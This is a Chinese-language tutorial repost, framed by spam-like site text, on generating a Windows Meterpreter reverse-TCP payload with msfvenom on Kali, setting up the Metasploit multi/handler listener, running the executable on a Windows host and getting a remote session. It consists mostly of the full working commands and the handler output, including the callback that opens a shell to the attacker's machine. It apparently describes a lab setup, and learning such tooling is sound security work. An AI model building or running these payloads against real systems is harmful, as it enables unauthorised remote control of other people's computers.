中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Kali下Metasploit的shellcode在windows中的使用

發布時間:2020-06-30 10:48:23 來源:網絡 閱讀:3131 作者:Chen__k 欄目:安全技術

網絡拓撲:
Kali下Metasploit的shellcode在windows中的使用
kaili系統版本:
Kali下Metasploit的shellcode在windows中的使用
注:前面的版本在生成shellcode的時候用的是msfpayload命令

1.kaili生成shellcode:
root@debian:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe > /root/shell.exe
()
2.偵聽shellcode:

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.152.131
lhost => 192.168.152.131
msf exploit(multi/handler) > set lport 1211
lport => 1211
msf exploit(multi/handler) > exploit 
[*] Started reverse TCP handler on 192.168.152.131:1211 

3.將生成的sehllcode上傳至windows主機中并運行:
Kali下Metasploit的shellcode在windows中的使用

4.已經有session返回

msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.152.131:1211 

[*] Sending stage (179779 bytes) to 192.168.152.129
[*] Meterpreter session 1 opened (192.168.152.131:1211 -> 192.168.152.129:1039) at 2018-02-24 07:58:44 +0000

5.成功拿到shell:
Kali下Metasploit的shellcode在windows中的使用

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

武清区| 太仓市| 镇巴县| 连南| 井研县| 冷水江市| 洪雅县| 崇明县| 潼关县| 资兴市| 唐海县| 烟台市| 广汉市| 阳泉市| 绥芬河市| 田东县| 陇南市| 江城| 大厂| 肥乡县| 东丽区| 新平| 元谋县| 保山市| 天门市| 海宁市| 视频| 明光市| 崇信县| 东乡族自治县| 子洲县| 商城县| 泸定县| 宜丰县| 安新县| 安康市| 驻马店市| 靖宇县| 合作市| 顺昌县| 达州市|